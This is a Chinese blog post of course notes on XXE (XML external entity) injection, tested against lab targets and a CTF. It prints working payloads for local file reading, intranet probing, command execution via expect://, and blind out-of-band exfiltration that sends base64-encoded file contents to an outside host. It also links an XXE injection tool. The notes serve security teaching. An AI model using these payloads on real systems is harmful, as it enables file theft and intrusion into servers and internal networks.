【小迪第39天】xml漏洞

最新推荐文章于 2022-07-27 12:58:14 发布
最新推荐文章于 2022-07-27 12:58:14 发布
阅读量444 收藏 1
点赞数
分类专栏: 小迪安全笔记 文章标签: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/118342130
版权

xml漏洞

漏洞利用

简单回显读文件

靶场pickchu

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///g://1.txt">
]>
<x>&xxe;</x>

读取g盘下的1.txt文件,提交成功读取
在这里插入图片描述

对内网的探测

<?xml version="1.0" encoding="UTF-8"?>        
<!DOCTYPE foo [ 
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" >
]>
<x>&rabbit;</x>

探测内网的服务器
提交内容为空,说明存在此文件

在这里插入图片描述
,因为当没有文件时就会报错,如下:
在这里插入图片描述

执行rce命令

前提目标服务器开启php拓展

#该CASE是在安装expect扩展的PHP环境里执行系统命令
<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "expect://id" >
]>
<x>&xxe;</x>

引入外部实体dtd

借用外部网站来进行操作

#引入外部实体dtd
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://33.33.33.33:8081/evil2.dtd">
    %file;
]>
<x>&send;</x>

读取目标网站下目录的evil2.dtd文件,而文件中写有xml代码,读取d盘下的test.txt文件
evil2.dtd:

<!ENTITY send SYSTEM "file:///d:/test.txt">

类似于文件包含中的外部包含

无回显读文件

#无回显-读取文件
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>

test.dtd:

<!ENTITY % payload 
	"<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
> 
%payload;

如果目标网站的xml没有回显,则使用此方法,将读取的文件值赋给file变量,然后访问目标网站的的文件,而文件内容则是区访问另一个网站,并且携带file参数,这时你就可以通过GET传参来接受这个参数值的内容了

演示:
目标网站开启日志
在这里插入图片描述并且网站写有文件,来接受file的值
在这里插入图片描述
把代码插入到网站时,因为要访问目标网站,日志就存下了记录
在这里插入图片描述
并且携带了file的值
在这里插入图片描述
解码后:成功显示文件内容
在这里插入图片描述

有点类似反向连接

绕过

https://www.cnblogs.com/20175211lyz/p/11413335.html

漏洞发现

通过工具扫描,或者爬行网站目录信息,通过筛选有关text/xml于application/xml信息来发现xml格式数据,还可以通过盲猜来更改Content-type的值来进行发现,对方网站可能type类型不是xml但不代表不接受xml数据,通过更改来发现

如:通过burpsuite的爬虫,通过过滤历史记录来搜查xml
在这里插入图片描述筛选出xml的数据包
在这里插入图片描述
通过添加恶意代码,来判断
在这里插入图片描述
成功显示!

CTF题目

http://web.jarvisoj.com:9882/
抓包,更改content-type类型
在这里插入图片描述
植入恶意代码
在这里插入图片描述
成功回显!

vulnbub靶机实战

https://blog.csdn.net/qq_44930903/article/details/112333612

xml注入工具

https://github.com/enjoiz/XXEinjector
git clone https://github.com/enjoiz/XXEinjector.git

https://www.cnblogs.com/bmjoker/p/9614990.html工具使用

道长在此
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
39:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
39.1)【XML漏洞专题】必备的基础知识、利用原理、构建规则
04-24 1818
【专题】XML利用必备基础知识
XML外部实体漏洞 (XXE)简介
最新发布
allway2的博客
07-27 1225
例如,假设您的应用程序必须从他们的系统中获取用户的操作系统详细信息。例如,他们可以禁用服务器上的防火墙,这将有助于他们发起其他攻击。因此,在这篇博客中,我将解释什么是XXE,以及如何保护您的应用程序免受这种风险的影响。这样做的一部分是为了了解常见的漏洞。如果您有一个使用XML的Web应用程序,那么保护它对您来说很重要。考虑到XXE漏洞可能对您的服务器造成的损害,您不能冒险。因此,黑客可以使用XML外部实体功能修改请求并获取该文件的详细信息。的功能,其中包含有关XML文档结构的信息。...
微服务搭建 SpringCloud 注册中心及配置中心管理
09-05 1753
SpringCloud搭建微服务架构 SpringBoot 版本1.5.6.RELEASE Dalston.SR3  与时俱进,一起学习进步。 经过几学习实践整理,已经完成SpringCloud 注册中心 、SpringCloud Config配置中心 搭建。 安装的三台Linux虚拟机: JDK环境1.8 master :192.168.0.132    打包运行注册中心 n...
xml的xxe漏洞
m0_48907714的博客
04-25 4199
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
Nacos 的高级应用(一)
我是混IT圈的
04-20 1166
源码:学习demo: 关于学习的所有代码 目录: 1、Nacos的服务分级存储模型 2、Nacos的权重配置 3、Nacos的环境隔离 一、Nacos的服务分级存储模型 1、概念 一个服务可以有多个实例,例如我们的user-service,可以有: 127.0.0.1:8081 127.0.0.1:8082 127.0.0.1:8083 假如这些实例分布于全国各地的不同机房,例如: 127.0.0.1:8081,在上海机房 127.0.0.1:80
NVDCVE2002-2020年3月xml漏洞文件数据合集.zip
05-07
标题中的“NVDCVE2002-2020年3月xml漏洞文件数据合集.zip”指的是一份包含从2002年至2020年3月期间的美国国家漏洞数据库(NVD)的CVE(Common Vulnerabilities and Exposures)信息的XML格式数据集合。NVD是美国国家...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
XML文件解析编辑小工具
04-11
"XML文件解析编辑小工具",如firstobject xml editor 2.4,是一款专为XML文档设计的轻量级编辑器,提供了对XML文件的深度解析和编辑功能。 这款工具的特色在于其绿色小巧的特性,意味着它无需安装即可使用,占用...
.net webapi接收xml格式数据的3种情况小结
01-20
前言 ...是构建RESTful应用程序的理想平台的.NET框架...刚拿到项目,我的第一想法是对方会以什么形式发送xml格式的数据给我呢,设想三种情况。 我一开始拿到手上的是一串xml格式字符串。如下 <?xml version=1.0 encodi
xxe漏洞攻防 简介 xml 引用外部实体 构造恶意内容
whatday的专栏
08-25 870
目录 一、XML基础知识 二、XML外部实体注入(XML ExternalEntity) 三、客户端XXE案例 四、防御XXE攻击 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD 根元素.
EMQX4.1.0集群搭建带redis认证_docker版
ninja_的博客
09-28 1370
一 、 环境说明 环境 : docker:18.03.1-ce EMQ X Broker版本 : 4.1.0-alpine 集群发现策略 : static(静态节点列表自动集群) 认证方式 : redis方式 密码加密 : SHA256 二、部署架构 这种部署模式下 EMQ X 单集群可轻松支持 100 万设备。 这里我们使用haproxy作为 LB。 EMQ X 默认开启的 MQTT 服务 TCP 端口: 端口 说明 1883 MQTT 协议端口 8883 MQTT/SSL 端口
XML中的DOCTYPE属性
小人物大青春的博客
03-05 4832
一、概述: DTD声明始终以!DOCTYPE开头,空一格后跟着文档根元素的名称。 如果是内部DTD(私有DTD),则再空一格出现[],在中括号中是文档类型定义的内容. 而对于外部DTD,则又分为私有DTD与公共DTD, 私有DTD使用SYSTEM表示,接着是外部DTD的URL. 公共DTD则使用PUBLIC,接着是DTD公共名称,接着是DTD的URL. 如下所示是公共DTD示例。 <!DOC...
XML的基础和DOCTYPE字段的解析
墨尔本,晴
07-30 290
或者看下面的网址 [url]http://msdn.microsoft.com/zh-cn/library/ms256059(VS.80).aspx[/url] 本文摘自[url]http://www.iteye.com/topic/517520[/url] [color=red]DTD——文档类型定义(Document Type Definition)[/color]\ 由于XM...
xml DOCTYPE说明
yangbo2921946188的博客
03-10 460
xml解析器首先根据A标识到jar包中查找对应目标; 如果通过A不能在本地jar包中定位到目标则通过B链接到网络上去获取。
Docker安装Nexus-Maven仓库
bhwqq的博客
11-03 228
docker volume create --name nexus-data docker run -d -p 8081:8081 --name nexus -v nexus-data:/nexus-data sonatype/nexus3 查看日志搜索pass后台登录密码 登录http://192.168.0.103:8081/ 然后设置代理仓库 5star-central -> https://repo.efivestar.com/repository/maven-publ..
在AS模拟器上访问本地电脑tomcat部署的资源报错java.net.ConnectException: Failed to connect to localhost/127.0.0.1:8081
英勇的博客
05-08 1412
前言 平时为了做些安卓测试,我也会写一下后端的东西。已经有好长一段时间没写过服务端相关的内容了,今看着郭霖的《第一行代码》,我把一个xml资源部署到了tomcat服务器上,在浏览器上是可以打开 http://localhost:8081/test/get_data.xml 这个地址进行访问的,但是在AS里面使用这个地址却报了如下的序错误(删减了部分错误内容): java.net.ConnectException: Failed to connect to localhost/127.0.0.1:8081
webpack将端口号http://localhost:8080/ 改成本机IP地址:192.168.1.103:8080/,在局域网内访问,方法如下:
热门推荐
麻球科技
03-13 2万+
找到config文件下的index.js 将host: 'localhost', // can be overwritten by process.env.HOST 改为:host: '192.168.1.103', // can be overwritten by process.env.HOST即可,在浏览器输入192.168.1.103:8080/即可访问...
web安全漏洞挖掘梳理
06-22
在本文中,我们将重点讨论XXE(XML External Entity)漏洞,并从XML的基础知识,XXE攻击方式,利用方法以及防御措施等方面展开讨论。 首先,我们先来了解一下XML的基础知识。XML(Extensible Markup Language)是一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值